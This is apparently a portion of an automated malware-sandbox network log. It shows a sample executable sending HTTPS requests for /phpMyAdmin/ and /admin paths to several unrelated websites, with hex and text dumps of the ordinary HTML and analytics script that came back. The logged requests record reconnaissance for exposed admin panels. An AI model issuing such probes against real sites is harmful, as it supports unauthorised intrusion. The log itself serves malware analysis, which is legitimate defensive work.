                                                                                                                                                                                                    2023-11-26 05:59:45 UTC628INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privateCF-Cache-Status: DYNAMICReport-To: {"endpoints":
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC741INData Raw: 37 64 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 69 6e 69 74 3d 7b 61 6a 61 78 3a 7b 64 65 6e 79 5f 6c 69 73 74 3a 5b 22 62 61 6d 2e 65 75 30 31 2e 6e 72 2d 64 61 74 61 2e 6e 65 74 22 5d 7d 7d 3b 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 6c 6f 61 64 65 72 5f 63 6f 6e 66 69 67 3d 7b 6c 69 63 65 6e 73 65 4b 65 79 3a 22 4e 52 4a 53 2d 38 39 33 62 34 33 36 63 64
                                                                                                                                                                                                    Data Ascii: 7d3b<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"><script type="text/javascript">(window.NREUM||(NREUM={})).init={ajax:{deny_list:["bam.eu01.nr-data.net"]}};(window.NREUM||(NREUM={})).loader_config={licenseKey:"NRJS-893b436cd
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1369INData Raw: 70 72 6f 64 75 63 74 3a 76 6f 69 64 20 30 2c 65 78 74 72 61 3a 76 6f 69 64 20 30 2c 6a 73 41 74 74 72 69 62 75 74 65 73 3a 7b 7d 2c 75 73 65 72 41 74 74 72 69 62 75 74 65 73 3a 76 6f 69 64 20 30 2c 61 74 74 73 3a 76 6f 69 64 20 30 2c 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 3a 76 6f 69 64 20 30 2c 74 4e 61 6d 65 50 6c 61 69 6e 3a 76 6f 69 64 20 30 7d 2c 6f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 69 6e 66 6f 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 69 66 28 21 6f 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 49 6e 66 6f 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65
                                                                                                                                                                                                    Data Ascii: product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},o={};function s(e){if(!e)throw new Error("All info objects require an agent identifier!");if(!o[e])throw new Error("Info for ".concat(e
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1369INData Raw: 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 65 76 65 6e 74 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 6c 6f 6e 67 5f 74 61 73 6b 3a 21 31 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 73 65 73 73 69 6f 6e 5f 74 72 61 63 65 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 68 61 72 76 65 73 74 3a 7b 74 6f 6f 4d 61 6e 79 52 65 71 75 65 73 74 73 44 65 6c 61 79 3a 36 30 7d 2c 73 65 73 73 69 6f 6e 5f
                                                                                                                                                                                                    Data Ascii: stTimeSeconds:30,autoStart:!0},page_view_event:{enabled:!0,autoStart:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,long_task:!1,autoStart:!0},session_trace:{enabled:!0,harvestTimeSeconds:10,autoStart:!0},harvest:{tooManyRequestsDelay:60},session_
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1369INData Raw: 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 67 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 67 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 66 28 29 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 69 6e 69 74 3d 67 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 76 61 72 20 6e 3d 68 28 65 29 3b 69 66 28 6e 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 73 70 6c 69 74 28 22 2e 22
                                                                                                                                                                                                    Data Ascii: )throw new Error("Configuration for ".concat(e," was never set"));return g[e]}function v(e,t){if(!e)throw new Error(p);g[e]=(0,i.D)(t,f());const n=(0,r.ek)(e);n&&(n.init=g[e])}function m(e,t){if(!e)throw new Error(p);var n=h(e);if(n){for(var r=t.split("."
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1369INData Raw: 77 20 6e 65 77 20 45 72 72 6f 72 28 22 52 75 6e 74 69 6d 65 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 45 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 45 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 6b 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 72 75 6e 74 69 6d 65 3d 45 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 72 79 7b 63 6f 6e
                                                                                                                                                                                                    Data Ascii: w new Error("Runtime for ".concat(e," was never set"));return E[e]}function T(e,t){if(!e)throw new Error("All runtime objects require an agent identifier!");E[e]=(0,i.D)(t,k);const n=(0,r.ek)(e);n&&(n.runtime=E[e])}function R(e){return function(e){try{con
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1369INData Raw: 75 6d 65 6e 74 2c 69 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 4e 61 76 69 67 61 74 6f 72 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61 6e 63 65 6f
                                                                                                                                                                                                    Data Ascii: ument,i="undefined"!=typeof WorkerGlobalScope&&("undefined"!=typeof self&&self instanceof WorkerGlobalScope&&self.navigator instanceof WorkerNavigator||"undefined"!=typeof globalThis&&globalThis instanceof WorkerGlobalScope&&globalThis.navigator instanceo
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1369INData Raw: 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 64 2c 52 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 72 3d 6e 28 38 33 32 35 29 2c 69 3d 6e 28 31 32 38 34 29 2c 61 3d 6e 28 34 33 32 32 29 2c 6f 3d 6e 28 33 33 32 35 29 3b 63 6f 6e 73 74 20 73 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 7b 73 74 61 67 65 64 3a 21 31 2c 70 72 69 6f 72 69 74 79 3a 6f 2e 70 5b 74 5d 7c 7c 30 7d 3b 75 28 65 29 2c 73 5b 65 5d 2e 67 65 74 28 74 29 7c 7c 73 5b 65 5d 2e 73 65 74 28 74 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 65 26 26 28 73 5b 65 5d 7c 7c 28 73 5b 65 5d 3d 6e 65 77 20 4d 61 70 29 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 6c 65 74 20 65 3d 61 72 67 75
                                                                                                                                                                                                    Data Ascii: 3:(e,t,n)=>{"use strict";n.d(t,{L:()=>d,R:()=>c});var r=n(8325),i=n(1284),a=n(4322),o=n(3325);const s={};function c(e,t){const n={staged:!1,priority:o.p[t]||0};u(e),s[e].get(t)||s[e].set(t,n)}function u(e){e&&(s[e]||(s[e]=new Map))}function d(){let e=argu
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1369INData Raw: 67 74 68 3b 69 2b 2b 29 6e 5b 69 5d 3d 3d 3d 74 26 26 6e 2e 73 70 6c 69 63 65 28 69 2c 31 29 7d 2c 65 6d 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 2c 69 2c 61 29 7b 21 31 21 3d 3d 61 26 26 28 61 3d 21 30 29 3b 69 66 28 75 2e 61 62 6f 72 74 65 64 26 26 21 69 29 72 65 74 75 72 6e 3b 74 26 26 61 26 26 74 2e 65 6d 69 74 28 65 2c 6e 2c 72 29 3b 66 6f 72 28 76 61 72 20 6f 3d 70 28 72 29 2c 63 3d 76 28 65 29 2c 64 3d 63 2e 6c 65 6e 67 74 68 2c 6c 3d 30 3b 6c 3c 64 3b 6c 2b 2b 29 63 5b 6c 5d 2e 61 70 70 6c 79 28 6f 2c 6e 29 3b 76 61 72 20 66 3d 62 28 29 5b 73 5b 65 5d 5d 3b 66 26 26 66 2e 70 75 73 68 28 5b 67 2c 65 2c 6e 2c 6f 5d 29 3b 72 65 74 75 72 6e 20 6f 7d 2c 67 65 74 3a 6d 2c 6c 69 73 74 65 6e 65 72 73 3a 76 2c 63 6f 6e 74 65 78 74 3a 70 2c 62 75
                                                                                                                                                                                                    Data Ascii: gth;i++)n[i]===t&&n.splice(i,1)},emit:function(e,n,r,i,a){!1!==a&&(a=!0);if(u.aborted&&!i)return;t&&a&&t.emit(e,n,r);for(var o=p(r),c=v(e),d=c.length,l=0;l<d;l++)c[l].apply(o,n);var f=b()[s[e]];f&&f.push([g,e,n,o]);return o},get:m,listeners:v,context:p,bu
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1369INData Raw: 2c 67 65 74 20 73 69 67 6e 61 6c 28 29 7b 72 65 74 75 72 6e 20 61 3d 21 30 2c 21 31 7d 7d 3b 72 2e 5f 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 2c 72 2e 5f 41 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 69 7c 7c 61 3f 7b 63 61 70 74 75 72 65 3a 21 21 65 2c 70 61 73 73 69 76 65 3a 69 2c 73 69 67 6e 61 6c 3a 74 7d 3a 21 21 65 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e
                                                                                                                                                                                                    Data Ascii: ,get signal(){return a=!0,!1}};r._A.addEventListener("test",null,e),r._A.removeEventListener("test",null,e)}catch(e){}function o(e,t){return i||a?{capture:!!e,passive:i,signal:t}:!!e}function s(e,t){let n=arguments.length>2&&void 0!==arguments[2]&&argumen


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    443192.168.2.451181185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC178OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC307INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 58 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 58 2d 43
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=0Expires: Sun, 26 Nov 2023 05:59:44 GMTVary: Accept-EncodingX-Cache-Status: MISSX-C
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC634INData Raw: 32 36 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30 30 30 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 73 63 72 69
                                                                                                                                                                                                    Data Ascii: 26e<!doctype html><html lang="en"><head><meta charset="utf-8"/><link rel="icon" href="/favicon.ico"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#000000"/><meta name="description" content="descri


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    444192.168.2.45110595.168.220.2104436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC224OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.beachrecruitment.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: OF=9et5pla7nsi6m08nuam1qvco53
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC535INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 74 72 61 6e 73 66 65 72 2d 65 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 6b 38 73 70 65 72 73 69 73 74 65 6e 74 3d 39 63 33 37 36 33 31 64 66 63 61 30 65 66 63 62 32 38 38 63 66 64 30 66 35 37 34 65 65 39 34 63 7c 31 31 66 31 38 37 36 33 38 36 34 33 65 31 33 64 37 62 64 31 39 36 33 39 39 31 66 61 63 35 32 62 3b 20 45 78 70 69 72 65 73 3d 54 75 65 2c 20 32 38 2d 4e 6f 76 2d 32 33 20 30 35 3a 35 39 3a 34 34 20 47
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 05:59:45 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedset-cookie: k8spersistent=9c37631dfca0efcb288cfd0f574ee94c|11f187638643e13d7bd1963991fac52b; Expires=Tue, 28-Nov-23 05:59:44 G
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC10516INData Raw: 32 39 30 43 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6e 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 42 65 61 63 68 20 52 65 63 72 75 69 74 6d 65 6e 74 20 42 2e 56 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 4a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20
                                                                                                                                                                                                    Data Ascii: 290C<!DOCTYPE html><html lang="nl"><head><title>Beach Recruitment B.V.</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/Javascript"><meta http-equiv="Content-Style-Type"
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC2696INData Raw: 41 38 31 0d 0a 65 73 3c 2f 53 54 52 49 4b 45 3e 3c 2f 41 3e 3c 2f 50 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 21 2d 2d 4c 49 4e 4b 53 2d 2d 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 77 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 3c 64 69 76 20 69 64 3d 22 73 63 72 6f 6c 6c 64 6f 77 6e 22 3e 0a 20 20 20 20 20 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 63 72 6f 6c 6c 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 2f 68 65 61
                                                                                                                                                                                                    Data Ascii: A81es</STRIKE></A></P></div></div></div>...LINKS--></div></div><div class="pager"><div class="sw"></div></div><div id="scrolldown"> <div class="icon-scroll"></div> </div></div></hea
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC8645INData Raw: 32 31 42 44 0d 0a 65 63 72 75 69 74 6d 65 6e 74 2e 63 6f 6d 2f 76 61 63 61 74 75 72 65 73 2f 76 61 63 61 74 75 72 65 5f 70 72 6f 64 75 63 74 69 6f 6e 5f 6d 61 6e 61 67 65 72 5f 64 65 5f 6b 75 79 70 65 72 5f 38 32 30 34 31 30 5f 31 31 2e 68 74 6d 6c 22 3e 50 72 6f 64 75 63 74 69 6f 6e 20 4d 61 6e 61 67 65 72 20 2f 20 44 65 20 4b 75 79 70 65 72 3c 2f 61 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 0a 09 09 0a 09 09 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 6f 6f 6b 49 74 65 6d 57 6f 72 64 20 6a 73 6c 4b 65 79 77 6f 72 64 20 6a 73 6c 4c 6f 63 61 74 69 6f 6e 22 3e 0a 09 09 09 3c 73 70 61 6e 3e 69 6e 3c 21 2d 2d 53 69 6e 67 6c 65 57 6f 72 64 4c 69 6e 6b 31 2d 2d 3e 3c 2f 73 70 61 6e 3e 56 65 72 74 72 6f 75 77 65 6c 69 6a 6b 0a 09 09 3c 2f 64 69 76 3e
                                                                                                                                                                                                    Data Ascii: 21BDecruitment.com/vacatures/vacature_production_manager_de_kuyper_820410_11.html">Production Manager / De Kuyper</a></div><div class="hookItemWord jslKeyword jslLocation"><span>in...SingleWordLink1--></span>Vertrouwelijk</div>
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1395INData Raw: 35 36 43 0d 0a 72 22 3e 0a 09 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6e 6f 74 69 66 79 5f 73 75 62 6a 65 63 74 5f 63 6f 6e 73 75 6c 74 61 6e 74 22 20 76 61 6c 75 65 3d 22 49 6e 66 6f 72 6d 61 74 69 65 20 61 61 6e 76 72 61 61 67 20 76 61 6e 61 66 20 64 65 20 77 65 62 73 69 74 65 22 3e 0a 09 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6e 6f 74 69 66 79 5f 73 75 62 6a 65 63 74 5f 63 75 73 74 6f 6d 65 72 22 20 76 61 6c 75 65 3d 22 55 77 20 61 61 6e 76 72 61 61 67 20 62 69 6a 20 42 65 61 63 68 20 52 65 63 72 75 69 74 6d 65 6e 74 20 26 20 43 61 72 65 65 72 22 3e 0a 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 72 6d 49 6e 70 75 74 20 63 6f 6e 74
                                                                                                                                                                                                    Data Ascii: 56Cr"><input type="hidden" name="notify_subject_consultant" value="Informatie aanvraag vanaf de website"><input type="hidden" name="notify_subject_customer" value="Uw aanvraag bij Beach Recruitment & Career"><div class="formInput cont
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC3578INData Raw: 44 46 33 0d 0a 20 72 65 6c 65 76 61 6e 74 65 20 66 75 6e 63 74 69 65 73 20 6f 70 20 48 42 4f 2d 20 65 6e 20 57 4f 2d 6e 69 76 65 61 75 2e 3c 2f 64 69 76 3e 0a 09 09 09 3c 21 2d 2d 49 4e 54 52 4f 4c 49 4e 4b 53 2d 2d 3e 0a 09 09 0a 09 09 0a 09 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 34 20 6d 61 69 6e 4c 65 76 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 65 61 63 68 72 65 63 72 75 69 74 6d 65 6e 74 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6d 73 5f 63 61 74 65 67 6f 72 69 65 2f 39 34 36 37 37 2f 62 62 2f 31 2f 69 64 2f 39 34 36 37 37 22 20 74 69 74 6c 65 3d 22 53 69 74 65 6d 61 70 22 3e 53 69 74 65 6d 61 70 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 3c
                                                                                                                                                                                                    Data Ascii: DF3 relevante functies op HBO- en WO-niveau.</div>...INTROLINKS--></div></li> <li class="col-md-4 mainLev"><a href="https://www.beachrecruitment.com/index.php/cms_categorie/94677/bb/1/id/94677" title="Sitemap">Sitemap</a> <
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    445192.168.2.451350185.54.192.1254436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC168OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: talentius.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
